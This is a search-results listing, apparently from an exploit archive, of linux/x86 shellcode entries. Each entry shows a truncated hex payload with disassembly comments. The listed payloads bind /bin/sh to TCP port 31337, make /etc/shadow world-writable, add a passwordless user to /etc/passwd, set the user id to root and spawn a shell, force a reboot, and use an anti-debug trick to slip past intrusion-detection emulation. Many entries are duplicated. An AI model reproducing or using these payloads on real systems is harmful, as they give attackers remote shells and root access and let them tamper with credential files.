5626 matches found
linux/x86 Bind /bin/sh to 31337/tcp 80 bytes
linux/x86 Bind /bin/sh to 31337/tcp 80 bytes. Shellcode exploit for linx86 platform / linux/x86 bind '/bin/sh' to 31337/tcp - 80 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push...
linux/x86 Bind /bin/sh to 31337/tcp + fork 98 bytes
linux/x86 Bind /bin/sh to 31337/tcp + fork 98 bytes. Shellcode exploit for linx86 platform / linux/x86 bind '/bin/sh' to 31337/tcp + fork - 98 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx...
linux/x86 eject cd-rom follows /dev/cdrom symlink + exit 40 bytes
linux/x86 eject cd-rom follows /dev/cdrom symlink + exit 40 bytes. Shellcode exploit for linx86 platform / linux/x86 eject cd-rom follows "/dev/cdrom" symlink + exit - 40 bytes - izik / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx...
linux/x86 chmod/etc/shadow, 0666 + exit 32 bytes
linux/x86 chmod/etc/shadow, 0666 + exit 32 bytes. Shellcode exploit for linx86 platform / linux/x86 chmod"/etc/shadow", 0666 + exit - 32 bytes - izik / char shellcode = "\x6a\x0f" // push $0xf "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\x66\xb9\xb6\x01" // mov $0x1b6,%cx...
linux/x86 getppid + execve/proc/pid/exe 51 bytes
linux/x86 getppid + execve/proc/pid/exe 51 bytes. Shellcode exploit for linx86 platform / linux/x86 getppid + execve"/proc//exe", "/proc//exe", NULL - 51 bytes - izik / char shellcode = "\x6a\x40" // push $0x40 "\x58" // pop %eax "\xcd\x80" // int $0x80 // // : // "\x4c" // dec %esp "\x99" // clt...
linux/x86 reboot - 20 bytes
linux/x86 reboot - 20 bytes. Shellcode exploit for linx86 platform / linux/x86 rebootLINUXREBOOTMAGIC1, LINUXREBOOTMAGIC2, LINUXREBOOTCMDRESTART - 20 bytes - izik / char shellcode = "\x6a\x58" // push $0x58 "\x58" // pop %eax "\xbb\xad\xde\xe1\xfe" // mov $0xfee1dead,%ebx "\xb9\x69\x19\x12\x28" /...
linux/x86 setreuid0, 0 + execve/bin/sh 31 bytes
linux/x86 setreuid0, 0 + execve/bin/sh 31 bytes. Shellcode exploit for linx86 platform / linux/x86 setreuid0, 0 + execve"/bin/sh", "/bin/sh", NULL, NULL - 31 bytes - izik / char shellcode = "\x6a\x46" // push $0x46 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\x31\xc9" // xor %ecx,%ecx...
linux/x86 execve/bin/sh / PUSH - 23 bytes
linux/x86 execve/bin/sh / PUSH - 23 bytes. Shellcode exploit for linx86 platform / linux/x86 execve"/bin/sh", "/bin/sh", NULL / PUSH - 23 bytes - izik / char shellcode = "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f...
linux/x86 cat /dev/urandom > /dev/console 63 bytes
linux/x86 cat /dev/urandom /dev/console, just for kicks - 63 bytes. Shellcode exploit for linx86 platform / linux/x86 cat /dev/urandom /dev/console, no real profit just for kicks - 63 bytes - izik / char shellcode = "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\x68\x6e\x64\x6f\x6d" // push...
linux/x86 Bind /bin/sh to 31337/tcp 80 bytes
No description provided by source. / linux/x86 bind '/bin/sh' to 31337/tcp - 80 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" // push $0x2 // /...
linux/x86 Adduser without Password to /etc/passwd 59 bytes
No description provided by source. / linux/x86 adds user 'xtz' without password to /etc/passwd - 59 bytes - izik / char shellcode = "\x6a\x05" // push $0x5 // // exit: // "\x58" // pop %eax "\x99" // cltd "\x31\xc9" // xor %ecx,%ecx "\x66\xb9\x01\x04" // mov $0x401,%cx "\x52" // pu...
linux/x86 Bind /bin/sh to 31337/tcp + fork() 98 bytes
No description provided by source. / linux/x86 bind '/bin/sh' to 31337/tcp + fork - 98 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" // push $0...
linux/x86 eject cd-rom (follows /dev/cdrom symlink) + exit() 40 bytes
No description provided by source. / linux/x86 eject cd-rom follows "/dev/cdrom" symlink + exit - 40 bytes - izik / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\xb5\x08" // mov $0x8,%ch "\x68\x64\x72\x6f\x6d" // push...
linux/x86 quick (yet conditional eax != 0 and edx == 0) exit 4 bytes
No description provided by source. / linux/x86 quick yet conditional, eax != 0 and edx == 0 exit - 4 bytes - izik / char shellcode = "\xf7\xf0" // div %eax "\xcd\x80"; // int $0x80 int mainint argc, char argv int ret; ret = int &ret + 2; ret = int shellcode; // milw0rm.com 2006-01-...
linux/x86 getppid() + execve(/proc/pid/exe) 51 bytes
No description provided by source. / linux/x86 getppid + execve"/proc/pid/exe", "/proc/pid/exe", NULL - 51 bytes - izik / char shellcode = "\x6a\x40" // push $0x40 "\x58" // pop %eax "\xcd\x80" // int $0x80 // // convert: // "\x4c" // dec %esp "\x99" // cltd "\x6a\x0a" // push $0xa...
linux/x86 24/7 open cd-rom loop (follows /dev/cdrom symlink) 39 bytes
No description provided by source. / linux/x86 24/7 open cd-rom loop follows "/dev/cdrom" symlink - 39 bytes - izik / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\xb5\x08" // mov $0x8,%ch "\x68\x64\x72\x6f\x6d" // pus...
linux/x86 cat /dev/urandom > /dev/console just for kicks - 63 bytes
No description provided by source. / linux/x86 cat /dev/urandom /dev/console, no real profit just for kicks - 63 bytes - izik / char shellcode = "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\x68\x6e\x64\x6f\x6d" // push $0x6d6f646e "\x68\x2f\x75\x72\x61" // push $0x6172752f...
linux/x86 reboot() - 20 bytes
No description provided by source. / linux/x86 rebootLINUXREBOOTMAGIC1, LINUXREBOOTMAGIC2, LINUXREBOOTCMDRESTART - 20 bytes - izik / char shellcode = "\x6a\x58" // push $0x58 "\x58" // pop %eax "\xbb\xad\xde\xe1\xfe" // mov $0xfee1dead,%ebx "\xb9\x69\x19\x12\x28" // mov...
linux/x86 anti-debug trick (INT 3h trap) + execve /bin/sh 39 bytes
No description provided by source. / linux/x86 anti-debug trick INT 3h trap + execve"/bin/sh", "/bin/sh", NULL, NULL - 39 bytes The idea behind a shellcode w/ an anti-debugging trick embedded in it, is if for any reason the IDS would try to x86-emulate the shellcode it would glitch and fail. This...
linux/x86 Bind /bin/sh to 31337/tcp 80 bytes
Exploit for linux/x86 platform in category shellcode ============================================ linux/x86 Bind /bin/sh to 31337/tcp 80 bytes ============================================ / linux/x86 bind '/bin/sh' to 31337/tcp - 80 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" ...